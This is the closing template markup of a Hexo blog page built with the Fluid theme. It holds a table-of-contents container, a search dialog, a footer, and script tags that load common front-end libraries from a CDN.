    <i class="iconfont icon-list"></i>
    <span>Table of Contents</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">Search</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">Keyword</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/5.0.0/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">Blog works best with JavaScript enabled</div>
  </noscript>
</body>
</html>
